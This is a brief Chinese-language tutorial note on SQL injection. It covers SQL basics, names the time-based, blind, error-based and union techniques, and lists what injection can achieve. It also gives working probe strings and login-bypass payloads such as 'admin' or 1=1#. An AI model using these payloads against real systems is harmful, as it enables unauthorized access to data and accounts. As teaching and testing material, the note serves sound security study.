insert into 库.表(列1,列2,....) values(值1,值2,....) 条件 delete from 库.表 条件 update 库.表 set 列1=值,列2=值 条件 select 列1,列2 from 库.表 条件(*代表全部列,limit分页(limit 起始下标,条数)) 条件语句 where ....
1.延时注入 sleep(秒) 2.盲注(and 1=1 and 1=2)and hex(substr(data,1,1))>0 3.错误显示注入(利用数据库的错误消息来进行注入),mysql(64个字符),oracle(大概2000个字符左右),mssql(1千多还是2千多字符) 4.union注入 union all select username from admin
3.sql注入能干什么到底
1.获取数据库数据(曾删改查)
2.读写文件
3.执行操作系统命令
4.如何判断是否存在注入
数字型、字符型、搜索型
数字型
1 2
sql="select * from news where id=1 and 1=1"; sql="select * from news where id=1 order by 1";
字符型
1 2 3
1' and '1'='1 sql="select * from news where type='1' and '1'='1'"; sql="select * from news where type='1' order by 1'";
搜索型
1 2
%' and '%'=' sql="select * from news where title like '%%'"
5.万能钥匙 哈哈
1 2 3 4 5 6
admin' or 'a'='a admin' or 1=1#(mysql) admin' or 1=1--(sqlserver) admin' or 1=1;--(sqlserver) sql="select * from admin where username='' and password=''";
